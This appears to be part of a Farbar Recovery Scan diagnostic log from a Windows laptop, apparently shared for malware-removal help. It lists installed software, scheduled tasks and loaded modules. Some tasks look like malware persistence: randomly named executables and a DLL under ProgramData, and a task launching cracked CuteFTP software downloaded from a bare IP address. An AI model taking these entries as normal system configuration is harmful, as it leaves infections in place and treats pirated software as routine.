Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Nitro Pro 8 (HKLM\...\{2269F0D5-DE47-4313-9003-BB6357919314}) (Version: 8.5.5.7 - Nitro)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
QuickTime Alternative 1.81 (HKLM-x32\...\QuicktimeAlt_is1) (Version: 1.81 - )
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.)
ReminderInstaller (HKLM-x32\...\InstallShield_{48B99BC9-CEB0-485E-96B1-4609BC86D2DE}) (Version: 1.00.0000 - Absolute Software.)
ReminderInstaller (x32 Version: 1.00.0000 - Absolute Software.) Hidden
Revo Uninstaller Pro 3.1.4 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.4 - VS Revo Group, Ltd.)
SofTest v11 (HKLM-x32\...\InstallShield_{BEFAE631-635D-41B7-996E-33F134DE951D}) (Version: 11.31.1 - Examsoft)
SofTest v11 (x32 Version: 11.31.1 - Examsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.5 - Synaptics Incorporated)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.15 - Lenovo)
UserGuide (x32 Version: 1.0.0.15 - Lenovo) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VPN Unlimited version 3.1.5 (HKLM-x32\...\{DC24521E-872B-41AF-93EA-FE477902D6FB}_is1) (Version: 3.1.5 - KeepSolid Inc.)
VUDU To Go (HKLM-x32\...\com.vudu.air.Downloader) (Version: 2.3.1 - Vudu)
VUDU To Go (x32 Version: 2.3.1 - Vudu) Hidden
Windows Driver Package - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo)
Windows Driver Package - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
WinRAR 5.30 beta 5 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.5 - win.rar GmbH)
XnConvert 1.73 (HKLM-x32\...\XnConvert_is1) (Version: 1.73 - Gougelet Pierre-e)
Yoga Picks (HKLM-x32\...\{267C8BA0-876B-4589-9F14-EFB84ABCEA7F}) (Version: 1.00.013.0731 - Lenovo)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6798.0207\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)

==================== Restore Points =========================


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2013-08-22 07:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03896D04-23AB-4F74-A27D-B1B71EE41E2C} - System32\Tasks\Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask => C:\Windows\system32\MDMAgent.exe [2016-07-16] (Microsoft Corporation)
Task: {03FC901B-03A8-46EB-801A-6B41B55D19B8} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {0532AB2A-3568-4A59-9C82-2B644C49851D} - System32\Tasks\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate
Task: {09D247E6-38E4-4228-BB1B-6BE1E48FC850} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {11EF8237-224D-4CF9-9039-61D08754EA5D} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {132934A7-AF74-4FBF-8B3E-69282D4B6053} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-06-03] (Synaptics Incorporated)
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task
Task: {184784E2-6ACB-4154-BD0F-A955BE13F177} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange
Task: {1AD363AC-A1A5-4239-86F6-60C9AC4B4F31} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task
Task: {20F8AF67-5750-4720-B0AC-8D14ACF2A51E} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTaskLogon => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {287685D1-1882-4B11-8A3F-7DA00FFC31C2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\Windows\System32\AutoWorkplace.exe
Task: {35C15BFF-0053-4E3F-9D8F-12A1B3315818} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {365DF4D4-9F2A-4BB6-B466-7B245416627A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {36DF9173-D619-4613-85F9-64D7768DA80D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {43DF67E8-D733-48FA-98F2-4E6D341E4A79} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {44707F62-A094-44E9-AF19-40CD1E6A8FA5} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {460930EB-5F58-4CAF-8E29-F0D47ED74F1C} - \{0D080447-7F09-0979-0F11-050B0F0D110D} -> No File <==== ATTENTION
Task: {51B7FB15-4DCB-400E-9A98-10E802F21FB3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceScreenOnOff
Task: {5654DFBB-E797-4758-B9A0-8BAE94A91F1D} - System32\Tasks\Microsoft\Windows\DUSM\dusmtask => C:\Windows\System32\dusmtask.exe [2016-07-16] (Microsoft Corporation)
Task: {5B1BFB8A-7401-4997-9C41-F6CE9BD3A096} - System32\Tasks\Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate
Task: {5FAAF530-ED1B-4F7B-AD7B-1694AA0B202B} - System32\Tasks\Microsoft\Windows\CertificateServicesClient\CryptoPolicyTask
Task: {6232090F-3BD0-4E1F-960B-78CBA797F685} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleWnsCommand
Task: {668FBCA0-F2D3-48CC-8B65-72CF17BC93FE} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2017-02-23] (Microsoft Corporation)
Task: {675C1F35-C487-4F46-8C84-0A5E9589D3C2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {67DB9C2C-778D-4C59-9507-E882F7A00413} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Logon => C:\Windows\system32\ProvTool.exe [2016-09-24] (Microsoft Corporation)
Task: {6B1AE720-1359-4B9E-9C0F-60167361EF01} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask
Task: {6D1C0035-5CAD-4340-A533-D63C9853BCC9} - System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Management Initialization
Task: {6E8AE752-C5D2-4B34-B351-338B4370A342} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleCommand
Task: {6EB74394-17E6-4CD1-922E-7ABCAA8840E5} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {769A9BD4-DD4F-4EC7-AB96-408AF78E5A35} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {7AC5E1E2-2FD3-40CD-8842-88CE53A3609C} - System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense
Task: {7D45AAE3-C208-40FF-B374-A9B31F11F7A3} - System32\Tasks\{8A254196-3D8E-F63D-E565-AD7C49709C85} => C:\ProgramData\{5072ACE0-E7D9-1B4B-3712-1D14D15C2594}\D66BD8CC-61C0-6F67-DF41-48BB72D20D63.exe <==== ATTENTION
Task: {7D64B009-CEAB-4E68-B328-7CD0AC72B421} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {80416385-3D28-4A19-941E-3A6AF6251733} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: {82EBF27F-B848-4FC6-A93C-0E2F5DEF2F73} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {84074B47-185C-4F11-9725-63EEC24862DA} - System32\Tasks\Microsoft\Windows\License Manager\TempSignedLicenseExchange
Task: {8519140C-2AEF-4987-B1B6-075F6AAB760A} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {85F00F57-CCEF-43D1-AA53-8FB9FFCD43BF} - System32\Tasks\{26246267-DEF5-4009-831D-1F5587DB66B2} => pcalua.exe -a "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE\cuteftppro.exe" -d "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE"
Task: {8992DB38-9182-4B89-A615-A01B3F8C9F8F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {8D791FAA-0257-4EBC-A6DD-74E842528806} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceSettingChange
Task: {9851188E-AC07-4F36-BA28-6D00BB2C9C46} - System32\Tasks\Microsoft\Windows\Device Information\Device => C:\Windows\system32\devicecensus.exe [2016-10-14] (Microsoft Corporation)
Task: {A1A1610B-2B55-4C5E-BC46-458BF76BA02A} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {A4497E84-87C6-4477-BDFD-E958CED4C0BE} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {A56FD01F-A5C7-4E0F-8A87-94E430DB47D0} - System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A} => C:\PROGRA~3\ea2cb491\ddb08c37.dll/s /n /I:"/rt" "C:\PROGRA~3\ea2cb491\ddb08c37.dll"
Task: {A7F3919A-4125-4892-A812-236A5557F5E7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-21] (Piriform Ltd)
Task: {AA1E3E10-D4BA-4681-8F7C-779A395428D0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B320E058-C6FA-413F-876B-0C9B4428AE66} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic6
Task: {B6EE76B2-4F82-4E15-9345-C867A29CBAD0} - System32\Tasks\Microsoft\Windows\Speech\SpeechModelDownloadTask => C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe [2016-09-24] (Microsoft Corporation)
Task: {B8C83F4E-09CF-4B80-84F1-BCA8AC50B112} - System32\Tasks\OneDrive Standalone Update Task v2 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {BDDEF317-2692-422F-AEA2-FFD67DC7CEA3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterUserDevice
Task: {C125018F-0B81-4B64-B7DC-0E01220E5D0E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceAccountChange
Task: {C34D8C79-A216-4091-9D42-EC02CF67B018} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C55F594B-885F-4350-A465-7D88160B3801} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {C6B2579B-4962-4D12-883D-BBD420573A6C} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic1
Task: {CAFE5B51-DC10-4097-8DB7-704EE8566FA5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CC1FFF22-A79B-469F-9BBD-E135EF0BE706} - \Adobe Flash Player PPAPI Notifier -> No File <==== ATTENTION
Task: {CC636E49-0109-402B-A40B-A37C29069A95} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\LocateCommandUserSession
Task: {D19A2726-897E-4F7D-9CE4-0773B449CE9E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceConnectedToNetwork
Task: {D394BE25-2E16-45D4-AAB2-3E8861A09351} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask
Task: {D3C4106A-D511-42C6-9716-465644534C87} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierinstall => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {D941F53F-7907-4FBE-B1E7-69EBD5B3A5D8} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange
Task: {DA856DF9-93EE-4AB2-87C2-867385F2262A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {DD1F0805-7E74-403A-85DE-5C0E31E01169} - System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask => C:\Windows\system32\spaceman.exe [2016-09-15] (Microsoft Corporation)
Task: {DDAECFC0-67E3-4062-BF25-CD685F73B394} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\IntegrityCheck
Task: {DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {E1935286-5CEB-4530-9F4D-F6427CD704B9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {E1949760-83C6-436C-AAC4-3082F5B107C3} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {E6C59EFE-9151-4D35-BEA9-93E8415BF71B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E7B04252-97CA-42C6-9920-F58B76B2C3E1} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic24
Task: {E9BC11D6-9D78-4595-B779-862926E669D9} - System32\Tasks\Lenovo Smart Voice => C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvTrayLoad.exe [2013-10-26] (Lenovo)
Task: {EA9BAA00-6604-4A27-8A73-AFA65F0EE1B3} - System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup => Rundll32.exe %windir%\System32\Windows.SharedPC.AccountManager.dll,StartMaintenance
Task: {ECEDC57D-8965-4EB1-BD6F-84791D928E23} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierdaily => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 05:42 - 2016-07-16 05:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-11-08 01:15 - 2017-01-17 03:25 - 00117440 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2013-10-26 19:01 - 2012-04-24 04:43 - 00390632 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2013-10-26 19:01 - 2013-10-26 19:01 - 00061200 _____ () C:\ProgramData\LenovoTransition\Server\x64\dptf.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-07-29 23:04 - 2016-05-24 10:43 - 08909504 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-10-16 04:02 - 2015-10-16 04:02 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2016-09-24 00:58 - 2016-09-24 00:58 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 22:44 - 2016-12-21 01:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-19 12:24 - 2017-01-19 12:25 - 01969360 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.7.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll
2017-01-19 12:24 - 2017-01-19 12:25 - 00381440 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.7.0_x64__8wekyb3d8bbwe\Microsoft.Notes.Upgrade.dll
2017-01-10 22:44 - 2016-12-21 00:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 22:44 - 2016-12-21 00:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-01-10 22:44 - 2016-12-21 00:47 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00294672 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe
2013-10-26 19:01 - 2013-10-26 19:01 - 00108304 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\TransitionServer.exe
2017-02-02 19:58 - 2017-02-01 03:47 - 02459992 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
2017-02-02 19:58 - 2017-02-01 03:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll
2017-03-01 18:15 - 2017-03-01 18:15 - 01070080 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.452.0_x64__8wekyb3d8bbwe\TimeBackground.dll
2017-01-10 22:44 - 2016-12-21 00:47 - 00115712 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\DeviceSideServicesActionUriHandler.dll
2017-01-10 22:44 - 2016-12-21 00:47 - 00522752 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.NodeWinrtWrap.dll
2016-07-16 05:43 - 2016-07-16 08:27 - 00040448 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\winrt-projections\bin\Winrt_Projections.node
2016-07-16 05:43 - 2016-07-16 08:26 - 00813056 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http\bin\NodeRT_Windows_Web_Http.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00963584 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.headers\bin\NodeRT_Windows_Web_Http_Headers.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00249344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.filters\bin\NodeRT_Windows_Web_Http_Filters.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00572416 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.storage.streams\bin\NodeRT_Windows_Storage_Streams.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00403968 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.foundation\bin\NodeRT_Windows_Foundation.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00183296 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\nodert-buffer-utils\bin\NodeRT_Buffer_Utils.node
2016-07-16 05:43 - 2016-07-16 08:26 - 00288256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.cortana.pal\bin\NodeRT_Windows_Cortana_PAL.node
2017-02-22 22:08 - 2017-02-22 22:08 - 00073728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-02-22 22:08 - 2017-02-22 22:08 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-02-22 22:08 - 2017-02-22 22:08 - 42895360 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-02-06 16:02 - 2017-02-06 16:02 - 02215424 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\roottools.dll
2017-01-23 07:36 - 2017-01-23 07:36 - 00055808 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11610.1001.25.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll
2014-04-07 08:31 - 2014-04-07 08:31 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll
2016-04-25 11:39 - 2016-04-25 11:39 - 00904704 _____ () C:\Program Files (x86)\Examsoft\Softest 11.0\System.Data.SQLite.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00102672 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Config\1366\TransitionLib.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00101648 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\LUpdatePackage.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00101648 _____ () C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LUpdatePackage.dll
2013-10-26 18:44 - 2013-08-08 14:25 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

 

[shivmister]

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\BlackChipPoker:Win32App_1
AlternateDataStreams: C:\Program Files\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files\CCleaner:Win32App_1
AlternateDataStreams: C:\Program Files\Dolby Digital Plus:Win32App_1
AlternateDataStreams: C:\Program Files\FileZilla FTP Client:Win32App_1
AlternateDataStreams: C:\Program Files\Intel:Win32App_1
AlternateDataStreams: C:\Program Files\iTunes:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Office 15:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files\WinRAR:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Apple Software Update:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\BlueStacks:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\DVD Shrink:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\LastPass:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Magical Jelly Bean:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Malwarebytes Anti-Malware:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\mIRC:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Mozilla Firefox:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\MSXML 4.0:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\QuickTime Alternative:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\TeamViewer:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VPN Unlimited:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VUDUToGo:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\XnConvert:Win32App_1
AlternateDataStreams: C:\WINDOWS\SysWOW64:Win32App_1
AlternateDataStreams: C:\ProgramData\BlueStacks:Win32App_1
AlternateDataStreams: C:\ProgramData\Intel(R) Update Manager:Win32App_1
AlternateDataStreams: C:\ProgramData\regid.1991-06.com.microsoft:Win32App_1

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iai2c.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uefi.sys => ""="Driver"
